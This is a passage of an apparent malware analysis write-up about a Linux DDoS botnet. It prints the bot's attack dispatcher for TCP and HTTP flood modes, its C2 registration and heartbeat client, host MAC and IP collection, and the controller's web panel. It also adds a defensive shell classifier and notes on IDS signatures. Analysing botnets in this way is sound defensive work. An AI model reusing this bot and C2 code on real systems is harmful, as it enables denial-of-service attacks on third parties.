usleep(1000*cmd->delay);
}
exit(0);;
}
void start_attack(COMMAND *cmd, int *pid, int *pid_cnt)
{
//pthread_t pt;
int i;
int ret = -1;
pid = malloc(sizeof(int) * cmd->thread);
if(pid == NULL)
{
DEBUG(DEBUG_FATAL, "malloc is error\n");
return;
}
*pid_cnt = cmd->thread;

switch (cmd->type)
{
case CMD_TCP_FLOOD:
DEBUG(DEBUG_FATAL,"start %d threads TcpDataFlood attack\n", cmd->thread);
for (i = 0; i < cmd->thread; i++)
{
//pthread_create(&pt, NULL, TcpDataFlood, cmd);

ret = TcpDataFlood(cmd);
if(ret >= 0)
{
pid[i] = ret;
}
}
break;
case CMD_TCP_MULTI_CONNECT:
DEBUG(DEBUG_FATAL,"start %d threads TcpMultiConnect attack\n", cmd->thread);
for (i = 0; i < cmd->thread; i++)
{
//pthread_create(&pt, NULL, TcpMultiConnect, cmd);
ret = TcpMultiConnect(cmd);
if(ret >= 0)
{
pid[i] = ret;
}
}
break;
case CMD_TCP_CAT_FACE:
DEBUG(DEBUG_FATAL,"start %d threads TcpCatFace attack\n", cmd->thread);
for (i = 0; i < cmd->thread; i++)
{
//pthread_create(&pt, NULL, TcpCatFace, cmd);
ret = TcpCatFace(cmd);
if(ret >= 0)
{
pid[i] = ret;
}
}
break;
case CMD_WEB_GET_FULL:
DEBUG(DEBUG_FATAL,"start %d threads WebGetFull attack\n", cmd->thread);
for (i = 0; i < cmd->thread; i++)
{
//pthread_create(&pt, NULL, WebGetFull, cmd);
ret = WebGetFull(cmd);
if(ret >= 0)
{
pid[i] = ret;
}
}
break;
case CMD_WEB_CAT_FACE:
DEBUG(DEBUG_FATAL,"start %d threads WebCCAttack attack\n", cmd->thread);
for (i = 0; i < cmd->thread; i++)
{
//pthread_create(&pt, NULL, WebCCAttack, cmd);
ret = WebCCAttack(cmd);
if(ret >= 0)
{
pid[i] = ret;
}
}
break;
case CMD_WEB_INFINITUDE:
DEBUG(DEBUG_FATAL,"start %d threads WebInfinitudeCC attack\n", cmd->thread);
for (i = 0; i < cmd->thread; i++)
{
//pthread_create(&pt, NULL, WebInfinitudeCC, cmd);
ret = WebInfinitudeCC(cmd);
if(ret >= 0)
{
pid[i] = ret;
}
}
break;
case CMD_WEB_SPIDER:
DEBUG(DEBUG_FATAL,"start %d threads WebSpiderCC attack\n", cmd->thread);
for (i = 0; i < cmd->thread; i++)
{
//pthread_create(&pt, NULL, WebSpiderCC, cmd);
ret = WebSpiderCC(cmd);
if(ret >= 0)
{
pid[i] = ret;
}
}
break;
default:
DEBUG(DEBUG_FATAL,"unsupported attack command!\n");
break;
}
}
void stop_attack(int *pid, int pid_cnt)
{
int i = 0;
for(i = 0; i < pid_cnt; i++)
{
kill(pid[i], SIGKILL);
}
}
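
Two of the HTTP routines above contain formatting bugs that make their requests easy to recognise on the wire, and this added example (not code from the toolkit or the report) turns the hard-coded header layouts into a classifier. WebCCAttack, and WebSpiderCC on ports other than 80, have no "\r\n" between the User-Agent value and "Cache-Control" in their sprintf format, so the two headers are fused into one line; WebSpiderCC on port 80 passes "http://" where the format expects the Host value and the target IP twice into Referer. WebGetFull and WebInfinitudeCC are recognisable by their fixed User-Agent strings with no space after the colon. The sample requests are constructed to match those sprintf/strcat sequences (203.0.113.10 is a documentation address); a rebuilt bot with edited strings would need new patterns.

```shell
#!/bin/sh
# Added example: classify a raw HTTP request by the fixed header layouts of
# the flood routines in attack.c. Patterns are derived only from the strings
# visible in that source.

# classify_request: $1 = request text with CRLF line endings; prints the
# routine whose layout it matches, or "none".
classify_request() {
    if printf '%s' "$1" | grep -q '^Host: http://'; then
        echo WebSpiderCC                      # port-80 branch: Host gets "http://"
    elif printf '%s' "$1" | grep -qF 'Firefox/3.0.15Cache-Control:'; then
        echo WebCCAttack-or-WebSpiderCC       # missing \r\n fuses the two headers
    elif printf '%s' "$1" | grep -qF 'User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)' &&
         printf '%s' "$1" | grep -q '^Host:[^ ]'; then
        echo WebGetFull                       # fixed UA, "Host:" with no space
    elif printf '%s' "$1" | grep -qF 'MyIE 3.01' &&
         printf '%s' "$1" | grep -q '^Content-Type: text/html'; then
        echo WebInfinitudeCC                  # GET carrying a Content-Type header
    else
        echo none
    fi
}

# Constructed requests, laid out as the corresponding attack.c code emits them.
REQ_GETFULL=$(printf 'GET /index.html HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\nAccept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\nHost:203.0.113.10\r\nConnection: Keep-Alive\r\n\r\n')
REQ_CC=$(printf 'GET / HTTP/1.1\r\nHost: 203.0.113.10\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15Cache-Control: no-store, must-revalidate\r\nReferer: http://203.0.113.10\r\nConnection: keep-alive\r\n\r\n')
REQ_SPIDER80=$(printf 'GET /item?id=7 HTTP/1.1\r\nHost: http://\r\nCache-Control: no-store, must-revalidate\r\nReferer: 203.0.113.10203.0.113.10\r\nConnection: Close\r\n\r\n')
REQ_INFINITE=$(printf 'GET / HTTP/1.1\r\nContent-Type: text/html\r\nHost: 203.0.113.10\r\nAccept: text/html, */*\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)\r\n\r\n')
REQ_BENIGN=$(printf 'GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.4.0\r\nAccept: */*\r\n\r\n')

for r in "$REQ_GETFULL" "$REQ_CC" "$REQ_SPIDER80" "$REQ_INFINITE" "$REQ_BENIGN"; do
    classify_request "$r"
done
```

The same strings can be dropped into an IDS rule as content matches. Note also that WebInfinitudeCC never closes its sockets (the close(S) is commented out), so a bot running that mode exhausts its own descriptors and, on an embedded device, tends to fall over on its own.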


And the C2 client code, with something interesting in it: a request for http://wap.ip138.com/ip_search138.asp?ip=115.183.160.20 HTTP/1.1\r\n", an IP-geolocation lookup of a hard-coded address, in a block that is disabled with #if 0:

#include <stdio.h> 
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <pthread.h>
#include <errno.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <fcntl.h>
//#include <ifaddrs.h>
#include "common.h"
#include "sysCmdClient.h"
#include "resolve.h"
#include "socket5.h"
static sysClientInfo g_sysClientInfo = {};
int checkSysConnect(int sock)
{
int ret = -1;
struct timeval timeout;
fd_set readfd;
timeout.tv_sec = 10;
timeout.tv_usec = 0;
FD_ZERO(&readfd);
FD_SET(sock, &readfd);
ret = select(sock +1, NULL, &readfd, NULL, &timeout);
if(ret < 0)
{
return -1;
}
else if( ret == 0)
{
return -1;
}
if(FD_ISSET(sock, &readfd))
{
int err = 0;
socklen_t len = sizeof(err);
if(getsockopt(sock, SOL_SOCKET, SO_ERROR, &err, &len) < 0)
{
return -1;
}
else if( err != 0)
{
return -1;
}
else
{
return 0;
}

}

return -1;
}
int sendSysCmdReq(void)
{
int ret = -1;
int sock = -1;
int nSend = 0, nRecv = 0;
struct sockaddr_in addrCenter;
SYS_CMD_HEAD sysCmdReqHead = {};
SYS_CMD_REQ_BODY_EX sysCmdReqBody = {};
SYS_CMD_HEAD sysCmdResHead = {};
SYS_CMD_RES_BODY sysCmdResBody = {};
int optval = 1;
int CenterPort = 0;
char ip[32];
int flag = 0;

if(!g_sysClientInfo.init)
{
DEBUG(DEBUG_FATAL,"g_sysClientInfo is not init\n");
return -1;
}
sysCmdReqHead.mark[0] = MAGIC_NUM_1;
sysCmdReqHead.mark[1] = MAGIC_NUM_2_EX;
sysCmdReqHead.version = SYS_CMD_VERSION;
sysCmdReqHead.modId = -1;
sysCmdReqHead.modType = SYS_USER_REQ;
sprintf(sysCmdReqBody.userActionEx.userPort,"%d", g_sysClientInfo.userPort);
strcpy(sysCmdReqBody.userActionEx.userName, g_sysClientInfo.userName);
strcpy(sysCmdReqBody.userActionEx.userPass, g_sysClientInfo.userPass);
DEBUG(DEBUG_FATAL,"userPort is %s\n", sysCmdReqBody.userActionEx.userPort);


/* if socket creation failed during init (ADMIND_NETUPLOAD_EINCREATESOCKET), try again here */
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
DEBUG(DEBUG_FATAL, "creat sock for upload failed !!!");
ret = -1;
goto EXIT0;
}
if((setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *)&optval,sizeof(int))) < 0)
{
DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!");
ret = -1;
goto EXIT0;
}

/* set NOBLOCK */
flag = fcntl(sock, F_GETFL, 0);
fcntl(sock, F_SETFL, flag | O_NONBLOCK);
/* set timeout */
struct timeval timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, &timeout, sizeof (timeout)) < 0)
{
DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!\n");
ret = -1;
goto EXIT0;
}
if (!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR))
{
if(!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR_1))
{
DEBUG(DEBUG_FATAL, "can't get the resolve_ip \n");
ret = -1;
goto EXIT0;
}

}

bzero(&addrCenter, sizeof(struct sockaddr_in));
addrCenter.sin_family = AF_INET;
addrCenter.sin_port = htons(g_sysClientInfo.serverPort);
inet_aton(ip, &addrCenter.sin_addr);

DEBUG(DEBUG_FATAL,"send request to %s\n", ip);
//dbgPrint(TRACE, "alarmCenterIp=0x%x\n", htonl(pNetCfg->advance.nsAlertCfg.alertServerList[0].addr));

ret =connect(sock,(struct sockaddr *)&addrCenter,sizeof(struct sockaddr));
if(ret < 0 && errno == EINPROGRESS)
{
ret = checkSysConnect(sock);
if(ret < 0)
{
DEBUG(DEBUG_FATAL, "checkSysConnect error is %s !!!\n", strerror(errno));
ret = -1;
goto EXIT0;
}
}
else if(ret < 0)
{
DEBUG(DEBUG_FATAL, "connect error is %s !!!\n", strerror(errno));
ret = -1;
goto EXIT0;

}
/* set BLOCK */
flag = fcntl(sock, F_GETFL, 0);
fcntl(sock, F_SETFL, flag & ~O_NONBLOCK);
nSend = send(sock,&sysCmdReqHead,sizeof(SYS_CMD_HEAD),0);
/* send error */
if(nSend != sizeof(SYS_CMD_HEAD))
{
DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}
nSend = send(sock,&sysCmdReqBody,sizeof(SYS_CMD_REQ_BODY_EX),0);
/* send error */
if(nSend != sizeof(SYS_CMD_REQ_BODY_EX))
{
DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}
nRecv = recv(sock, &sysCmdResHead, sizeof(SYS_CMD_HEAD), 0);
if(nRecv != sizeof(SYS_CMD_HEAD))
{
DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}
nRecv = recv(sock, &sysCmdResBody, sizeof(SYS_CMD_RES_BODY), 0);
if(nRecv != sizeof(SYS_CMD_RES_BODY))
{
DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}

g_sysClientInfo.modeId = sysCmdResHead.modId;
ret = sysCmdResBody.cmdResult;
EXIT0:
close(sock);
return ret;
}
int sendUserState(void)
{
int ret = -1;
int sock = -1;
int nSend = 0, nRecv = 0;
struct sockaddr_in addrCenter;
SYS_CMD_HEAD sysCmdReqHead = {};
SYS_CMD_REQ_BODY_EX sysCmdReqBody = {};
SYS_CMD_HEAD sysCmdResHead = {};
SYS_CMD_RES_BODY sysCmdResBody = {};
int optval = 1;
int CenterPort = 0;
char ip[32] = {0};
int flag = 0;
if(!g_sysClientInfo.init)
{
DEBUG(DEBUG_FATAL,"g_sysClientInfo is not init\n");
return -1;
}
sysCmdReqHead.mark[0] = MAGIC_NUM_1;
sysCmdReqHead.mark[1] = MAGIC_NUM_2_EX;
sysCmdReqHead.version = SYS_CMD_VERSION;
sysCmdReqHead.modId = g_sysClientInfo.modeId;
sysCmdReqHead.modType = SYS_USER_HEAT;
//sysCmdInfo.userActionEx.userTime = time(NULL);

// only the port information needs to be sent
sprintf(sysCmdReqBody.userActionEx.userPort,"%d", g_sysClientInfo.userPort);
strcpy(sysCmdReqBody.userActionEx.userName, g_sysClientInfo.userName);
strcpy(sysCmdReqBody.userActionEx.userPass, g_sysClientInfo.userPass);
DEBUG(DEBUG_FATAL,"userPort is %s\n", sysCmdReqBody.userActionEx.userPort);
/* if socket creation failed during init (ADMIND_NETUPLOAD_EINCREATESOCKET), try again here */
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
DEBUG(DEBUG_FATAL, "creat sock for upload failed !!!");
ret = -1;
goto EXIT0;
}
if((setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *)&optval,sizeof(int))) < 0)
{
DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!");
ret = -1;
goto EXIT0;
}
/* set timeout */
struct timeval timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, &timeout, sizeof (timeout)) < 0)
{
DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!\n");
ret = -1;
goto EXIT0;
}

/* set NOBLOCK */
flag = fcntl(sock, F_GETFL, 0);
fcntl(sock, F_SETFL, flag | O_NONBLOCK);
if (!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR))
{
if(!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR_1))
{
DEBUG(DEBUG_FATAL, "can't get the resolve_ip \n");
ret = -1;
goto EXIT0;
}

}

bzero(&addrCenter, sizeof(struct sockaddr_in));
addrCenter.sin_family = AF_INET;
addrCenter.sin_port = htons(g_sysClientInfo.serverPort);
inet_aton(ip, &addrCenter.sin_addr);

DEBUG(DEBUG_FATAL,"send user state to %s\n", ip);

ret =connect(sock,(struct sockaddr *)&addrCenter,sizeof(struct sockaddr));
if(ret < 0 && errno == EINPROGRESS)
{
ret = checkSysConnect(sock);
if(ret < 0)
{
DEBUG(DEBUG_FATAL, "checkSysConnect error is %s !!!\n", strerror(errno));
ret = -2;
goto EXIT0;
}
}
else if(ret < 0)
{
DEBUG(DEBUG_FATAL, "connect error is %s !!!\n", strerror(errno));
ret = -2;
goto EXIT0;

}
/* set BLOCK */
flag = fcntl(sock, F_GETFL, 0);
fcntl(sock, F_SETFL, flag & ~O_NONBLOCK);
nSend = send(sock,&sysCmdReqHead,sizeof(SYS_CMD_HEAD),0);
/* send error */
if(nSend != sizeof(SYS_CMD_HEAD))
{
DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}
nSend = send(sock,&sysCmdReqBody,sizeof(SYS_CMD_REQ_BODY_EX),0);
/* send error */
if(nSend != sizeof(SYS_CMD_REQ_BODY_EX))
{
DEBUG(DEBUG_FATAL, "send failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}
nRecv = recv(sock, &sysCmdResHead, sizeof(SYS_CMD_HEAD), 0);
if(nRecv != sizeof(SYS_CMD_HEAD))
{
DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}
nRecv = recv(sock, &sysCmdResBody, sizeof(SYS_CMD_RES_BODY), 0);
if(nRecv != sizeof(SYS_CMD_RES_BODY))
{
DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}

if(sysCmdResBody.cmdResult != SYS_CMD_SUCCESS)
{
ret = -2;
}
EXIT0:
close(sock);
return ret;
}
#if 0
void getIpAddr(char *ip)
{
struct ifaddrs * ifAddrStruct=NULL;
char tmpAddrBuff[64] = {0};
void * tmpAddrPtr=NULL;
getifaddrs(&ifAddrStruct);
while (ifAddrStruct!=NULL)
{
if (ifAddrStruct->ifa_addr->sa_family == AF_INET)
{ // check it is IP4
// is a valid IP4 Address
tmpAddrPtr=&((struct sockaddr_in *)ifAddrStruct->ifa_addr)->sin_addr;

inet_ntop(AF_INET, tmpAddrPtr, tmpAddrBuff, 64);
if(strcmp(tmpAddrBuff, "127.0.0.1") != 0 &&\
strncmp(tmpAddrBuff, "192.168", 7) != 0)
{
f(nRecv != sizeof(sysCmdResInfo))
{
DEBUG(DEBUG_FATAL, "recv failed !!! error:%s \n", strerror(errno));
ret = -1;
goto EXIT0;
}
g_sysClientInfo.modeId = sysCmdResInfo.modId;
ret = sysCmdResInfo.cmdResult; strcpy(ip, tmpAddrBuff);
break;
}

//printf("%s IP Address %s/n", ifAddrStruct->ifa_name, tmpAddrBuff);
}

ifAddrStruct=ifAddrStruct->ifa_next;
}
}
void getIpAddr(char *ip)
{
char hname[128];
struct hostent *hent;
int i;
gethostname(hname, sizeof(hname));

hent = gethostbyname(hname);
// use only the first IP
sprintf(ip, "%s", inet_ntoa(*(struct in_addr*)(hent->h_addr_list[0])));
printf("hostname: %s/naddress list: ", hent->h_name);
for(i = 0; hent->h_addr_list[i]; i++) {
printf("%s\n", inet_ntoa(*(struct in_addr*)(hent->h_addr_list[i])));
}

return;
}
void getIpAddr(char *netInterface, char *ip)
{
int fd;
struct ifreq ifr;
struct sockaddr_in *our_ip = NULL;
struct in_addr addr = {0};
memset(&ifr, 0, sizeof(struct ifreq));
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) >= 0)
{
ifr.ifr_addr.sa_family = AF_INET;
strncpy(ifr.ifr_name, netInterface, sizeof(ifr.ifr_name) - 1);
/*ip*/
if (ioctl(fd, SIOCGIFADDR, &ifr) == 0)
{
our_ip = (struct sockaddr_in *) &ifr.ifr_addr;
memcpy(&addr, &our_ip->sin_addr.s_addr, sizeof(our_ip->sin_addr.s_addr));
}
/* close socket */
close(fd);
}
sprintf(ip, "%s", inet_ntoa(addr));
return;
}
// HTTP GET
static int WebGetFull(void)
{
int sock;
int ret = 0;
char check_tag[64] = {};
char ip[32];
char response_buff[10240] = {};
char *host = "wap.ip138.com";
char hostIp[64] = {0};
char *request_html ="GET http://wap.ip138.com/ip_search138.asp?ip=115.183.160.20 HTTP/1.1\r\n"
"Host:wap.ip138.com\r\n"
"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Connection:keep-alive\r\n\r\n";
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock == -1)
return sock;
struct sockaddr_in sin;
if (!resolve_ip(host, ip))
return 0;
inet_aton(ip, &sin.sin_addr);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
DEBUG(DEBUG_FATAL, "connect ip is %s\n", ip);
if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
DEBUG(DEBUG_FATAL, "connect is error %s\n", strerror(errno));
close(sock);
return -1;
}
struct timeval timeout;
timeout.tv_sec = 50;
timeout.tv_usec = 0;
if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, &timeout, sizeof (timeout)) < 0)
{
DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!\n");
return -1;
}


ret = send(sock,request_html,strlen(request_html) ,MSG_NOSIGNAL);
if(ret < strlen(request_html))
{
DEBUG(DEBUG_FATAL, "send request_html is error %s\n", strerror(errno));
return -1;
}
DEBUG(DEBUG_FATAL, "send buffer is %s\n", request_html);
ret = recv(sock, response_buff, sizeof(response_buff), 0);
if(ret < 0)
{
DEBUG(DEBUG_FATAL, "recv response_buff is error %s\n", strerror(errno));
return -1;
}
DEBUG(DEBUG_FATAL, "%s", response_buff);
char *p, *begain, *end;
sprintf(check_tag, "<div>%s<br/>", "115.183.160.20");
p = strstr(response_buff, check_tag);
if(p != NULL)
{
end = strchr(p, ' ');
*end = 0;

printf("#######%s#########\n", p+ strlen("<div>115.183.160.20<br/>") + 18);
}
close(sock);
cleanup:
return 0;
}
#endif
/* Collect the MAC of the first non-loopback interface that answers SIOCGIFHWADDR
 * (walking the SIOCGIFCONF list from the end). This is most likely the value the
 * panel shows in its "physical address" column. */
void getMacAddr(char *mac)
{
    int fd;
    struct ifreq ifrbuff[16] = {0};
    struct ifconf ifc = {0};
    struct sockaddr_in *addr = {0};    /* unused */
    char *address;                     /* unused */
    int intrface = 0;
    if((fd = socket(AF_INET, SOCK_DGRAM, 0)) >= 0)
    {
        ifc.ifc_len = sizeof(ifrbuff);
        ifc.ifc_buf = (caddr_t)ifrbuff;
        if (!ioctl (fd, SIOCGIFCONF, (char *) &ifc))
        {
            intrface = ifc.ifc_len / sizeof (struct ifreq);
            while(intrface-- > 0)
            {
                if(strcmp(ifrbuff[intrface].ifr_name, "lo") != 0)
                {
                    if (ioctl(fd, SIOCGIFHWADDR, (char *) &ifrbuff[intrface]) == 0)
                    {
                        /* note the trailing newline baked into the MAC string */
                        sprintf(mac, "%02x:%02x:%02x:%02x:%02x:%02x\n",
                                (unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[0],
                                (unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[1],
                                (unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[2],
                                (unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[3],
                                (unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[4],
                                (unsigned char)ifrbuff[intrface].ifr_hwaddr.sa_data[5]);
                        break;
                    }
                }
            }
        }
        /* close socket */
        close(fd);
    }
    DEBUG(DEBUG_FATAL, "mac is %s\n", mac);
    return;
}
/* Client-side registration state: C2 host/port, the client's own port, the
 * fixed USER_NAME and a freshly generated random password. */
int sysCmdClientInit(SERVER_INFO* serverInfo, short clientPort)
{
    int ret = 0;
    if(g_sysClientInfo.init)
    {
        DEBUG(DEBUG_FATAL, "Client have inited\n");
        return 0;
    }
    g_sysClientInfo.modeId = -1;
    g_sysClientInfo.onlieTime = 0;
    strcpy(g_sysClientInfo.serverAddr, serverInfo->name);   /* unbounded copy of the C2 name */
    g_sysClientInfo.serverPort = serverInfo->port;
    g_sysClientInfo.userPort = clientPort;
    strcpy(g_sysClientInfo.userName, USER_NAME);
    getRandPasswd(g_sysClientInfo.userPass);
    DEBUG(DEBUG_FATAL, "the passwd is %s\n", g_sysClientInfo.userPass);   /* password written to the debug log in the clear */

    g_sysClientInfo.init = 1;
    return 0;
}
/* Accessors used by the rest of the client; both return 0 (NULL) before init. */
char * sysGetUserName()
{
    if(!g_sysClientInfo.init)
    {
        DEBUG(DEBUG_FATAL, "Client not inited\n");
        return 0;
    }
    return g_sysClientInfo.userName;
}
char * sysGetUserPasswd()
{
    if(!g_sysClientInfo.init)
    {
        DEBUG(DEBUG_FATAL, "Client not inited\n");
        return 0;
    }
    return g_sysClientInfo.userPass;
}
/* Read the IPv4 address of netInterface via SIOCGIFADDR. The query is issued on
 * a raw socket (needs CAP_NET_RAW); if anything fails, addr stays 0.0.0.0 and
 * that is what gets reported. */
void gettmpIpAddr(char *netInterface, char *ip)
{
    int fd;
    struct ifreq ifr;
    struct sockaddr_in *our_ip = NULL;
    struct in_addr addr = {0};
    memset(&ifr, 0, sizeof(struct ifreq));
    if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) >= 0)
    {
        ifr.ifr_addr.sa_family = AF_INET;
        strncpy(ifr.ifr_name, netInterface, sizeof(ifr.ifr_name) - 1);
        /*ip*/
        if (ioctl(fd, SIOCGIFADDR, &ifr) == 0)
        {
            our_ip = (struct sockaddr_in *) &ifr.ifr_addr;
            memcpy(&addr, &our_ip->sin_addr.s_addr, sizeof(our_ip->sin_addr.s_addr));
        }
        /* close socket */
        close(fd);
    }
    sprintf(ip, "%s", inet_ntoa(addr));
    return;
}


Judging from the server-side source, the management end is an HTTP web interface. The page it serves is GBK-encoded and lists every agent's 代理IP (proxy IP), 端口 (port), 启动时间 (start time) and 物理地址 (physical address, presumably the MAC that getMacAddr collects), paged client-side 100 rows at a time, with a link to download the whole list as agent_info.txt. A second response type sends modInfo.txt as an attachment.

HTTP/1.1 200 OK
Server: wuchen's Server <0.1>
Accept-Ranges: bytes
Content-Length: %d
Connection: close
Content-Type: %s
Content-Disposition:attachment;filename = modInfo.txt

HTTP/1.1 400 ERROR
Server: wuchen's Server <0.1>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html" />
</head>
<body>
<table width="800" border="4" align="center" id="table1">
<tbody id="table2">
<tr><th align="lest">Proxy IP</th><th align="right">Port</th><th align="right">Start time</th><th align="right">Physical address</th></tr>
%s</tbody>
</table>
<div align="center"><span style= "text-align:center;" id="spanFirst">First page </span> <span id="spanPre">Previous page </span> <span id="spanNext">Next page </span><span id="spanLast"> Last page </span> Page <span id="spanPageNum"></span> / <span id="spanTotalPage"></span> pages
</div><div style = "position:fixed; bottom:10px; right:5px;" ><a href="agent_info.txt" >Click to download</a>
</div></body>
</html>
%s

<script>
var theTable = document.getElementById("table2");
var totalPage = document.getElementById("spanTotalPage");
var pageNum = document.getElementById("spanPageNum");
var spanPre = document.getElementById("spanPre");
var spanNext = document.getElementById("spanNext");
var spanFirst = document.getElementById("spanFirst");
var spanLast = document.getElementById("spanLast");
var numberRowsInTable = theTable.rows.length;
var pageSize = 100;
var page = 1;
function next() {
    hideTable();
    currentRow = pageSize * page;
    maxRow = currentRow + pageSize;
    if ( maxRow > numberRowsInTable ) maxRow = numberRowsInTable;
    for ( var i = currentRow; i< maxRow; i++ ) {
        theTable.rows[i].style.display = '';
    }
    page++;
    if ( maxRow == numberRowsInTable ) { nextText(); lastText(); }
    showPage();
    preLink();
    firstLink();
}
function pre() {
    hideTable();
    page--;
    currentRow = pageSize * page;
    maxRow = currentRow - pageSize;
    if ( currentRow > numberRowsInTable ) currentRow = numberRowsInTable;
    for ( var i = maxRow; i< currentRow; i++ ) {
        theTable.rows[i].style.display = '';
    }
    if ( maxRow == 0 ) { preText(); firstText(); }
    showPage();
    nextLink();
    lastLink();
}
function first() {
    hideTable();
    page = 1;
    for ( var i = 0; i<pageSize; i++ ) {
        theTable.rows[i].style.display = '';
    }
    showPage();
    preText();
    nextLink();
    lastLink();
}
function last() {
    hideTable();
    page = pageCount();
    currentRow = pageSize * (page - 1);
    for ( var i = currentRow; i<numberRowsInTable; i++ ) {
        theTable.rows[i].style.display = '';
    }
    showPage();
    preLink();
    nextText();
    firstLink();
}
function hideTable() {
    for ( var i = 0; i<numberRowsInTable; i++ ) {
        theTable.rows[i].style.display = 'none';
    }
}
function showPage() {
    pageNum.innerHTML = page;
}
function pageCount() {
    var count = 0;
    if ( numberRowsInTable%pageSize != 0 ) count = 1;
    return parseInt(numberRowsInTable/pageSize) + count;
}
function preLink() { spanPre.innerHTML = "<a href='javascript:pre();'>Previous page</a>"; }
function preText() { spanPre.innerHTML = "Previous page"; }
function nextLink() { spanNext.innerHTML = "<a href='javascript:next();'>Next page</a>"; }
function nextText() { spanNext.innerHTML = "Next page"; }
function firstLink() { spanFirst.innerHTML = "<a href='javascript:first();'>First page</a>"; }
function firstText() { spanFirst.innerHTML = "First page"; }
function lastLink() { spanLast.innerHTML = "<a href='javascript:last();'>Last page</a>"; }
function lastText() { spanLast.innerHTML = "Last page"; }
function hide() {
    for ( var i = pageSize; i<numberRowsInTable; i++ ) {
        theTable.rows[i].style.display = 'none';
    }
    totalPage.innerHTML = pageCount();
    pageNum.innerHTML = '1';
    nextLink();
    lastLink();
}
hide();
</script>

httpServer.c
[file]:%s ,[func: %s ,Line: %d] error: printf file_name is %s
[file]:%s ,[func: %s ,Line: %d] error: iconv_open is error
[file]:%s ,[func: %s ,Line: %d] error: iconv is error
www.ip138.com
GET http://www.ip138.com/ips1388.asp?ip=%s&action=2 HTTP/1.1
Host:www.ip138.com
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection:keep-alive
[file]:%s ,[func: %s ,Line: %d] error: connect ip is %s
[file]:%s ,[func: %s ,Line: %d] error: connect is error %s
[file]:%s ,[func: %s ,Line: %d] error: setsockopt for upload failed !!!
[file]:%s ,[func: %s ,Line: %d] error: send request_html is error %s
[file]:%s ,[func: %s ,Line: %d] error: send buffer is %s
[file]:%s ,[func: %s ,Line: %d] error: recv response_buff is error %s
recv %d data
recv len is %d
[file]:%s ,[func: %s ,Line: %d] error: %s
[file]:%s ,[func: %s ,Line: %d] error: can't search the addr
#######%s#########


Above is part of the source of the HTTP management page.
Its HTTP banner is quite distinctive:

###########################################
sysCmdServer.o
###########################################
Server: wuchen's Server <0.1>
Accept-Ranges: bytes
Content-Length: %d
Connection: close
Content-Type: %s

HTTP/1.1 200 OK
Server: wuchen's Server <0.1>
Accept-Ranges: bytes
Content-Length: %d
Connection: close
Content-Type: %s
Content-Disposition:attachment;filename = modInfo.txt


ZoomEye turns up nothing for Server: wuchen's Server.
The source code has been packed up and placed in the test code, lightly cleaned up.
